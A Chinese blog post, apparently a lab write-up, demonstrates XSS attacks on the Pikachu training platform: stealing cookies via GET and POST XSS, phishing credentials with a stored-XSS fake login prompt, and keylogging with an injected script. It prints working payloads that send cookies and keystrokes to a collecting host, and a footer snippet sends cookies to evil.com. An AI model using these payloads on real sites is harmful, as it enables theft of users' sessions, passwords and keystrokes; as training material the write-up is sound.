XSS的漏洞测试案例

最新推荐文章于 2024-02-03 21:12:03 发布
最新推荐文章于 2024-02-03 21:12:03 发布
阅读量2.1k 收藏 9
点赞数 2
分类专栏: pikachu漏洞实验 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51446936/article/details/117442775
版权

1、获取cookie的原理和实验演示

《get型xss》

第一步:搭建xss的后台

打开pikachu xss的后台管理工具(在pikachu漏洞平台底部---->管理工具----->xss后台)
在这里插入图片描述
根据提示进行安装,修改配置文件,即数据库的账户和密码
在这里插入图片描述
接下来,根据提示进行安装/初始化,然后进行登录

在这里插入图片描述
后台登录成功
在这里插入图片描述
现在xss后台没有任何数据

在这里插入图片描述
第二步:先将pikachu中cookie.php改为自己本地的ip,重定向到一个可信的网站,我的ip如下

路径为:D:\phpstudy2018\PHPTutorial\WWW\pikachu\pkxss\xcookie\cookie.php**

在这里插入图片描述
第三步:修改字符输入长度

在这里插入图片描述

第四步:输入框中输入如下playload,然后重定向到Pikachu的首页

<script>document.location = 'http://192.168.159.146:8080/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

在这里插入图片描述

第五步:此时查看xss后台,进行刷新

在这里插入图片描述

第六步:如果黑客将referer中的url链接发送给普通用户,一旦其访问这个链接,用户便跳转到首页,但是黑客就会获取到cookie

《post型xss》

在这里插入图片描述

第一步:登录,用户:admin,密码:123456。在输入框中输入一个参数,进行抓包

在这里插入图片描述

抓包查看:通过post方式传到后台,无法使用url进行攻击

在这里插入图片描述

第二步:伪造表单自动提交页面(路径:E:\phpStudy\PHPTutorial\WWW\pikachu\pkxss\xcookie\post.html)

注:修改完后要重启phpstudy服务

在这里插入图片描述

第三步:模拟的恶意站点

192.168.159.146:8080/pikachu/pkxss/xcookie/post.html

第四步:用户通过访问这个站点,然后跳转到首页,攻击者后台获取cookie

在这里插入图片描述

2、XSS进行钓鱼的原理和实验演示

《存储型XSS》

第一步:修改文件fish.php的ip(我的文件路径:E:\phpStudy\PHPTutorial\WWW\pikachu\pkxss\xfish)

在这里插入图片描述

注:这里需要注意的是,要将username和password中间的空格删除,拼接在一块。不然实验无法成功

在这里插入图片描述

第二步:在存在存储型xss漏洞的页面插入js代码请求

<img  src=" http://192.168.159.146:8080/pikachu/pkxss/xfish/fish.php"  />
<script  src="http://192.168.159.146:8080/pikachu/pkxss/xfish/fish.php"></script>

第三步:后台会有一个认证框,给用户发送。

在这里插入图片描述

第四步:用户一旦输入用户名和密码,就会重定向到后台,后台就会以get方式获取到用户名、密码

在这里插入图片描述

在这里插入图片描述

3、XSS获取键盘记录原理和实验演示

《存储型xss》
跨域的概念
http://       www    .      xyz.com    :     8080      /        script/test.js

协议          子域名           主域名           端口                资源地址

当协议、主机(主域名,子域名)、端口中的任意一个不相同时,称为不同域。我们把不同的域之间请求数据的操作,成为跨域操作

同源策略

所谓同源策略,就是规定两个域名之间不能使用JS进行相互操作。比如x.com域名下的javascript并不能操作y.com域下的对象

如果想要跨域操作,则需要管理员进行特殊的配置

例:header(“Access-Control-Allow-Origin:x.com”)指定

Tips:下面这些标签跨域加载资源(资源类型是有限制的)是不受同源策略限制的

<script src="...">   //js加载到本地执行

<img src="...">   //图片

<link href="...">   //css

<iframe src="..." >   //任意资源
为什么要有同源策略

A登录了淘宝,攻击者向A发送一个恶意链接urlb:http://www.盗你cookie.com

如果没有同源策略,即urlb上的js可以操作A的内容(如:获取cookie等)

有了同源策略,就限制了这种情况

实验演示

第一步:存入到数据库中,并且设置允许所有跨域访问,当然这里可设置自己想要允许的域

在这里插入图片描述

第二步:修改js文件中的ip,黑客通过用户输入获取键盘值,以post方式发送给攻击者后台

在这里插入图片描述

第三步:在留言板输入js代码

<script  src=" http://192.168.159.149:8080/pikachu/pkxss/rkeypress/rk.js">  </script>

在这里插入图片描述

第四步:打开控制的网络,不管输入什么,都是跳出页面请求失败

在这里插入图片描述

第五步:这时,后台已经获取了用户键盘输入的内容

在这里插入图片描述

要努力。。
关注
  • 2
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
Web安全测试之XSS实例讲解
01-19
Web安全测试之XSS XSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的.  比如获取用户的Cookie,导航到恶意网站,携带木马等。 作为测试人员,需要了解XSS的原理,攻击场景,如何修复。 才能有效的防止XSS的发生。 阅读目录 XSS 是如何发生的 HTML Encode XSS 攻击场景 XSS漏洞的修复 如何测试XSS漏洞 HTML Encode 和URL Encode的区别
第26天:WEB漏洞-XSS跨站之订单及Shell箱子反杀记1
08-03
WEB 漏洞-XSS 跨站之订单及 Shell 箱子反杀#XSS 平台及工具使用#XSS 经典应用案例测试#Session 与 Cookie 获取问题docum
渗透测试之XSS(跨站脚本攻击)
最新发布
weixin_52177486的博客
02-03 999
XSS的概念、分类、实例
转跨站脚本攻击详解
weixin_30700977的博客
02-18 686
1 前言 近年来,随着Web2.0的大潮,越来越多的人开始关注Web安全,新的Web攻击手法层出不穷,Web应用程序面临的安全形势日益严峻。 跨站脚本攻击(XSS)就是常见的Web攻击技术之一,由于跨站脚本漏洞易于出现且利用成本低,所以被OWASP开放式Web应用程序安全项目(OWASP,Open Web Application Security Project)列为当前的头号Web安...
【应用安全XSS一】XSS攻击测试以及防御
qq_35789269的博客
02-19 6340
跨站脚本攻击 跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script(php,js等)代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的特殊目的。 攻击实例 下面为一个Input标签: <input type="text" value="value"></input> 当用输入值
安全测试之xss攻击通用测试用例
m0_70669463的博客
07-05 1455
XSS全称是Cross Site Scripting即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现了不被预期的脚本指令并执行时,XSS就发生了。
Web安全XSS漏洞的测试(防止 黑客利用此漏洞.)
热门推荐
网络安全领域___专研者.
03-17 1万+
XSS漏洞的概括: XSS又叫CSS(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面,插入恶意JS代码,当用户浏览该页之时,嵌入其中JS代码就会被执行,从而达到攻击的目的.(包含:收集用户的Cookie,添加账号,修改密码,提高用户权限等等.)
XSS测试用例
q908544703的博客
05-28 1895
下载原件地址:链接:https://pan.baidu.com/s/1HQu4daTdxfgTDWAyXUD5lA 提取码:5mw1 在这里插入图片描述
xss测试用例
liu_xp_mother的博客
07-11 7458
1. alert(1); 2.alert('xss'); 3. 4.location.href="http://www.evil.com/cookies.php?cookie="+escape(document.cookie)" 5.ipt>alert('xss');ipt> 6. 7.@im\port'\ja\vasc\ript:alert(\"xss\")'; 8.alert(\
10个XSS攻击实例
m0_49521873的博客
05-25 1713
1. Cookie盗窃攻击:攻击者可以通过注入恶意代码,获取用户的 Cookie,并利用 Cookie 进行身份验证,获取用户的敏感信息。4. 注入点击劫持攻击:攻击者可以注入一段代码,将隐藏的按钮伪装成用户需要点击的区域,当用户点击时,实际上在执行一个恶意操作。9. 恶意相片攻击:攻击者可以在从社交媒体网站下载的相片中注入一段代码,当用户查看相片时,代码就会临时运行,窃取用户的信息。8. 恶意广告攻击:攻击者可以在广告中注入一段代码,当用户点击广告时,代码就可以窃取用户的个人信息。
这个工具可以帮你自动化XSS漏洞的发现和利用:XSS-Exploitation-Tool:一个强大的XSS漏洞扫描与利用工具
jklbnm12的博客
07-22 2297
功能说明获取关于目标浏览器的技术数据可以获取目标浏览器的类型、版本、操作系统、语言等信息获取目标用户的地理坐标位置可以获取目标用户的经纬度、国家、城市等信息获取已挂起/已访问的网页快照可以获取目标用户访问过或者正在访问的网页的截图获取已挂起/已访问的网页源代码可以获取目标用户访问过或者正在访问的网页的源代码提取表单输入字段数据可以获取目标用户在表单中输入过或者正在输入的数据获取Cookie数据可以获取目标用户在浏览器中存储的Cookie数据键盘记录功能。
The-Vulnerable-Web-Application:使用具有不同漏洞的 Node.js 和用于测试的示例网站制作
08-05
要求 需要创建Node.js, NPM, MySQL MySQL数据库.....XSS(Reflected) :要求在输入字段中输入名称,并显示有关名称的信息。 除了名称,如果用户还输入了一些脚本,如[removed]alert(10)</sc
wavsep:Web应用程序漏洞扫描程序评估项目-开源
04-26
访问WAVSEP主页以了解更多信息:https://code.google.com/p/wavsep/该项目包括以下测试案例:路径遍历/ LFI:816个测试案例(GET和POST)远程文件包含(通过RFI的XSS) :108个测试用例(GET&POST)反映的XSS:66...
XYCMS企业建站系统源码 v2.4 UTF8
04-03
安全性:防SQL注入,自动锁定入侵的IP地址,防XSS攻击,具有很好的过滤系统 功能简述: 企业信息管理:包括基本信息管理,添加,在线报名信息管理,问答中心信息管理 新闻中心管理:管理新闻信息内容,管理相关分类...
验证码绕过和防范
weixin_51446936的博客
05-28 2490
一、背景 本文主要讲解在pikachu靶场进行测试,然后对验证码绕过进行实验演示。验证码被绕过本身就是一种漏洞,但是程序员在写后端时,没对验证码进行判断,就给了黑客一些可乘之机,危害还是相当大的。 二、验证码 作用: 登录暴力破解 防止机器恶意注册 认证流程 客户端request登录页面,后台生成验证码 1.后台使用算法生成图片,并将图片reponse给客户端 2.同时将算法生成的值全局赋值存到SESSION 校验验证码 1.客户端将认证信息和验证码一同提交 2.后台对提交的验证码与Session里面
pikachu之XXE漏洞
weixin_51446936的博客
06-18 1948
一、概述 XXE -“xml external entity injection”,即"xml外部实体注入漏洞"。 概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题" 也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。 以PHP为例,在PHP里面解析xml用的是libxml,其在≥2.9.0的版本中,默认
pikachu之文件包含漏洞
weixin_51446936的博客
06-09 1912
一、文件包含漏洞概述 在web后台开发中,程序员往往为了提高效率以及让代码看起来更简洁,会使用“包含”函数功能。比如把一系列功能函数都写进function.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句<?php include function.php?>就可以调用函数代码 但有些时候,因为网站功能需求,会让前端用户选择需要包含的文件(或者在前端的功能中使用了“包含”功能),又由于开发人员没有对要包含的这个文件进行安全考虑,就导致攻击者可以通过修改包含文件的位置来让后台执行任意
RCE远程命令、代码执行漏洞
weixin_51446936的博客
06-08 1859
一、RCE(remote command/code execute)概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 1.远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。如果,设计者在完成该功能时,没有做严格的安
xss网站寻找xss漏洞
08-29
寻找XSS漏洞的方法可以通过手工挖掘、工具挖掘和代码审计三个部分来进行。在手工挖掘中,可以参考中提供的实践案例,通过快速找出网站中可能存在的XSS漏洞。工具挖掘可以使用一些专门用于漏洞扫描的工具,例如permeate渗透测试系统。中提供了一个示例URL,你可以通过访问该网站来进行XSS漏洞的挖掘。在验证漏洞的过程中,要注意不要使用谷歌内核的浏览器,因为谷歌内核浏览器自带XSS筛选器,这可能会导致无法复现网站上的反射型XSS漏洞。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [通过Web安全工具Burp suite找出网站中的XSS漏洞实战(二)](https://blog.csdn.net/weixin_33774308/article/details/88731071)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值